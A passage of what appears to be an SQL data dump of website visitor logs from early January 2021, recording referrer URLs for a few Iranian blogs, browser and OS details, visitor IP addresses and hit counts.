(7629,'2021-01-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,1,0),
(7630,'2021-01-01','https://t.co/M882OgbHAg?amp=1','Chrome','Android','9',NULL,NULL,'','185.125.207.221','000',0,3,0),
(7631,'2021-01-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(7632,'2021-01-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','195.206.169.216','000',0,2,0),
(7633,'2021-01-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.75.63.54','000',0,47,0),
(7634,'2021-01-01','http://ictbank.ir/blog','Android Browser','Android','4.1.1',NULL,NULL,'','45.83.91.28','000',0,2,0),
(7635,'2021-01-01','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(7636,'2021-01-01','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','45.249.84.72','000',0,2,0),
(7637,'2021-01-01','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.220.230.219','000',0,1,0),
(7638,'2021-01-01','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','52.30.107.151','000',0,1,0),
(7639,'2021-01-01','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','95.180.28.150','000',0,1,0),
(7640,'2021-01-01','http://ictbank.ir/blog','Yandex Browser','Windows','6.3',NULL,NULL,'','217.138.197.220','000',0,2,0),
(7641,'2021-01-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.41.59','000',0,1,0),
(7642,'2021-01-01','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','89.220.215.4','000',0,1,0),
(7643,'2021-01-01','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','84.17.36.141','000',0,2,0),
(7644,'2021-01-01','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','52.15.217.156','000',0,1,0),
(7645,'2021-01-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.133.230','000',0,1,0),
(7646,'2021-01-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.236.42.71','000',0,2,0),
(7647,'2021-01-01','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','Chrome','Windows','6.3',NULL,NULL,'','178.150.47.62','000',0,18,0),
(7648,'2021-01-01','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','89.238.191.198','000',0,2,0),
(7649,'2021-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(7650,'2021-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7651,'2021-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7652,'2021-01-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(7653,'2021-01-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.124.218','000',0,1,0),
(7654,'2021-01-01','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','195.206.183.82','000',0,2,0),
(7655,'2021-01-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7656,'2021-01-01','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','37.120.203.204','000',0,2,0),
(7657,'2021-01-02','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.172.228.35','000',0,21,0),
(7658,'2021-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.230.84','000',0,1,0),
(7659,'2021-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.87.212.58','000',0,2,0),
(7660,'2021-01-02','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','193.56.252.100','000',0,2,0),
(7661,'2021-01-02','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','171.252.60.7','000',0,2,0),
(7662,'2021-01-02','http://ictbank.ir/blog','Baidu Browser','Android','5.1.1',NULL,NULL,'','89.36.224.244','000',0,4,0),
(7663,'2021-01-02','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','212.102.54.104','000',0,4,0),
(7664,'2021-01-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(7665,'2021-01-02','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','45.12.220.76','000',0,2,0),
(7666,'2021-01-02','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.130.184.222','000',0,2,0),
(7667,'2021-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.170.71.160','000',0,1,0),
(7668,'2021-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.95.114','000',0,1,0),
(7669,'2021-01-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7670,'2021-01-02','http://ictbank.ir/blog','Chrome','Android','7.1',NULL,NULL,'','217.138.197.68','000',0,2,0),
(7671,'2021-01-02','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','20.151.64.19','000',0,1,0),
(7672,'2021-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.34.223.221','000',0,1,0),
(7673,'2021-01-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.152.181.148','000',0,2,0),
(7674,'2021-01-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','79.23.239.114','000',0,1,0),
(7675,'2021-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(7676,'2021-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(7677,'2021-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(7678,'2021-01-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7679,'2021-01-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(7680,'2021-01-02','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','147.30.246.5','000',0,2,0),
(7681,'2021-01-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','37.120.152.158','000',0,2,0),
(7682,'2021-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.73.149','000',0,14,0),
(7683,'2021-01-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7684,'2021-01-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.232.43.193','000',0,1,0),
(7685,'2021-01-02','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','31.13.188.28','000',0,2,0),
(7686,'2021-01-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7687,'2021-01-03','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','192.3.215.247','000',0,2,0),
(7688,'2021-01-03','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','3.250.73.236','000',0,1,0),
(7689,'2021-01-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,1,0),
(7690,'2021-01-03','http://ictbank.ir/blog','Instagram','Android','7.1.1',NULL,NULL,'','82.102.21.76','000',0,2,0),
(7691,'2021-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.245.129.23','000',0,1,0),
(7692,'2021-01-03','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','193.56.252.124','000',0,2,0),
(7693,'2021-01-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(7694,'2021-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.19.189.236','000',0,2,0),
(7695,'2021-01-03','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.214.144.32','000',0,1,0),
(7696,'2021-01-03','http://ictbank.ir/blog','UC Browser','Android','2.2.1',NULL,NULL,'','82.102.18.110','000',0,2,0),
(7697,'2021-01-03','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.245.96.81','000',0,1,0),
(7698,'2021-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.201.63','000',0,1,0),
(7699,'2021-01-03','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.246.184','000',0,1,0),
(7700,'2021-01-03','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','195.181.170.200','000',0,2,0),
(7701,'2021-01-03','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','14.171.49.109','000',0,2,0),
(7702,'2021-01-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(7703,'2021-01-03','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','18.223.111.64','000',0,1,0),
(7704,'2021-01-03','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','196.240.57.52','000',0,2,0),
(7705,'2021-01-03','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.254.204.114','000',0,1,0),
(7706,'2021-01-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(7707,'2021-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.180.40','000',0,1,0),
(7708,'2021-01-03','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','37.120.204.180','000',0,4,0),
(7709,'2021-01-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','123.191.136.171','000',0,1,0),
(7710,'2021-01-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.8.91.58','000',0,2,0),
(7711,'2021-01-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','212.102.54.119','000',0,2,0),
(7712,'2021-01-03','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','192.240.213.137','000',0,1,0),
(7713,'2021-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(7714,'2021-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7715,'2021-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7716,'2021-01-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(7717,'2021-01-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7718,'2021-01-03','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','80.110.109.46','000',0,1,0),
(7719,'2021-01-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(7720,'2021-01-04','http://ictbank.ir/blog','Instagram','iOS','11.4.1',NULL,NULL,'','31.13.188.28','000',0,2,0),
(7721,'2021-01-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','110.83.32.153','000',0,1,0),
(7722,'2021-01-04','http://ictbank.ir/blog','UC Browser','Android','5.1.1',NULL,NULL,'','89.40.183.30','000',0,2,0),
(7723,'2021-01-04','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(7724,'2021-01-04','http://ictbank.ir/blog','Unknown','FireOS','5',NULL,NULL,'','217.138.197.220','000',0,2,0),
(7725,'2021-01-04','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(7726,'2021-01-04','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','165.231.33.180','000',0,2,0),
(7727,'2021-01-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.71.134','000',0,1,0),
(7728,'2021-01-04','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','193.246.149.221','000',0,2,0),
(7729,'2021-01-04','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.216.32.36','000',0,2,0),
(7730,'2021-01-04','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','46.227.143.108','000',0,6,0),
(7731,'2021-01-04','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','196.196.203.52','000',0,2,0),
(7732,'2021-01-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7733,'2021-01-04','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','34.239.161.171','000',0,1,0),
(7734,'2021-01-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.162.161','000',0,1,0),
(7735,'2021-01-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.245.188.175','000',0,2,0),
(7736,'2021-01-04','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','113.58.234.182','000',0,1,0),
(7737,'2021-01-04','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','117.2.49.145','000',0,2,0),
(7738,'2021-01-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.159.88.84','000',0,2,0),
(7739,'2021-01-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7740,'2021-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(7741,'2021-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(7742,'2021-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(7743,'2021-01-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7744,'2021-01-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.98.10.217','000',0,1,0),
(7745,'2021-01-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7746,'2021-01-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.255.133.51','000',0,1,0),
(7747,'2021-01-04','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','193.37.255.188','000',0,2,0),
(7748,'2021-01-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','27.224.137.90','000',0,1,0),
(7749,'2021-01-05','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','52.214.239.160','000',0,1,0),
(7750,'2021-01-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','5.180.62.76','000',0,2,0),
(7751,'2021-01-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.61','000',0,1,0),
(7752,'2021-01-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.175.82','000',0,1,0),
(7753,'2021-01-05','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.139','000',0,1,0),
(7754,'2021-01-05','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','84.17.36.151','000',0,2,0),
(7755,'2021-01-05','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','119.76.1.125','000',0,1,0),
(7756,'2021-01-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','141.98.103.244','000',0,2,0),
(7757,'2021-01-05','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','141.98.102.132','000',0,2,0),
(7758,'2021-01-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7759,'2021-01-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','69.162.111.10','000',0,1,0),
(7760,'2021-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.44.157','000',0,1,0),
(7761,'2021-01-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(7762,'2021-01-05','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','188.165.174.33','000',0,86,0),
(7763,'2021-01-05','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','54.74.105.247','000',0,1,0),
(7764,'2021-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.106.80','000',0,1,0),
(7765,'2021-01-05','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.168.111.208','000',0,1,0),
(7766,'2021-01-05','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','89.40.183.30','000',0,2,0),
(7767,'2021-01-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(7768,'2021-01-05','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','37.120.204.180','000',0,2,0),
(7769,'2021-01-05','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.136.36','000',0,1,0),
(7770,'2021-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(7771,'2021-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7772,'2021-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(7773,'2021-01-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(7774,'2021-01-05','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','71.212.128.222','000',0,1,0),
(7775,'2021-01-05','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','37.120.201.196','000',0,2,0),
(7776,'2021-01-05','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','101.51.106.21','000',0,2,0),
(7777,'2021-01-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7778,'2021-01-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.146.82.202','000',0,2,0),
(7779,'2021-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(7780,'2021-01-06','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','195.154.36.140','000',0,2,0),
(7781,'2021-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.146.34','000',0,1,0),
(7782,'2021-01-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(7783,'2021-01-06','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','69.171.209.8','000',0,2,0),
(7784,'2021-01-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','132.232.9.184','000',0,1,0),
(7785,'2021-01-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','188.166.164.9','000',0,1,0),
(7786,'2021-01-06','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','37.120.131.252','000',0,2,0),
(7787,'2021-01-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','141.98.103.244','000',0,2,0),
(7788,'2021-01-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.232.27.19','000',0,2,0),
(7789,'2021-01-06','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.183.213.166','000',0,14,0),
(7790,'2021-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(7791,'2021-01-06','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','31.13.188.108','000',0,2,0),
(7792,'2021-01-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','82.102.22.228','000',0,2,0),
(7793,'2021-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.7.194','000',0,1,0),
(7794,'2021-01-06','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(7795,'2021-01-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7796,'2021-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.180.62.157','000',0,2,0),
(7797,'2021-01-06','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','14.166.253.7','000',0,2,0),
(7798,'2021-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.59.213.150','000',0,14,0),
(7799,'2021-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(7800,'2021-01-06','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(7801,'2021-01-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.176.222.57','000',0,2,0),
(7802,'2021-01-06','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.237.16.81','000',0,1,0),
(7803,'2021-01-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.244.106','000',0,1,0),
(7804,'2021-01-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','156.96.47.103','000',0,1,0),
(7805,'2021-01-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7806,'2021-01-06','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','182.156.238.110','000',0,1,0),
(7807,'2021-01-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(7808,'2021-01-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(7809,'2021-01-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(7810,'2021-01-06','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','217.138.192.100','000',0,2,0),
(7811,'2021-01-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','192.145.124.108','000',0,2,0),
(7812,'2021-01-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','95.154.139.231','000',0,1,0),
(7813,'2021-01-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','89.40.183.211','000',0,2,0),
(7814,'2021-01-07','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.252.65.212','000',0,1,0),
(7815,'2021-01-07','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','62.210.11.185','000',0,2,0),
(7816,'2021-01-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(7817,'2021-01-07','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','138.59.121.187','000',0,1,0),
(7818,'2021-01-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','83.97.23.4','000',0,2,0),
(7819,'2021-01-07','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.200.213.159','000',0,1,0),
(7820,'2021-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','217.146.82.202','000',0,2,0),
(7821,'2021-01-07','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','125.214.50.70','000',0,2,0),
(7822,'2021-01-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.240.54.4','000',0,2,0),
(7823,'2021-01-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.80.223','000',0,1,0),
(7824,'2021-01-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7825,'2021-01-07','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','194.127.172.77','000',0,2,0),
(7826,'2021-01-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.98.10.217','000',0,1,0),
(7827,'2021-01-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','69.162.111.10','000',0,1,0),
(7828,'2021-01-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.146.241.19','000',0,1,0),
(7829,'2021-01-07','http://ictbank.ir/blog','Internet Explorer','Windows','4.1',NULL,NULL,'','194.110.84.137','000',0,2,0),
(7830,'2021-01-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.198.22','000',0,1,0),
(7831,'2021-01-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.239.147','000',0,1,0),
(7832,'2021-01-07','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.228.151','000',0,1,0),
(7833,'2021-01-07','http://ictbank.ir/blog','UC Browser','Android','5.1',NULL,NULL,'','185.128.25.57','000',0,2,0),
(7834,'2021-01-07','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','213.232.87.138','000',0,2,0),
(7835,'2021-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(7836,'2021-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(7837,'2021-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(7838,'2021-01-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7839,'2021-01-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7840,'2021-01-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.104.47.48','000',0,26,0),
(7841,'2021-01-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.3.240.199','000',0,10,0),
(7842,'2021-01-07','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','141.98.103.228','000',0,2,0),
(7843,'2021-01-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.214','000',0,1,0),
(7844,'2021-01-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.61','000',0,1,0),
(7845,'2021-01-07','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.5.103','000',0,14,0),
(7846,'2021-01-07','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','185.246.208.94','000',0,2,0),
(7847,'2021-01-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.56.252.180','000',0,2,0),
(7848,'2021-01-08','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','217.96.163.246','000',0,2,0),
(7849,'2021-01-08','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','185.236.42.71','000',0,2,0),
(7850,'2021-01-08','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.129.162','000',0,1,0),
(7851,'2021-01-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(7852,'2021-01-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.169.255.22','000',0,2,0),
(7853,'2021-01-08','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','194.110.84.121','000',0,2,0),
(7854,'2021-01-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','27.222.248.111','000',0,4,0),
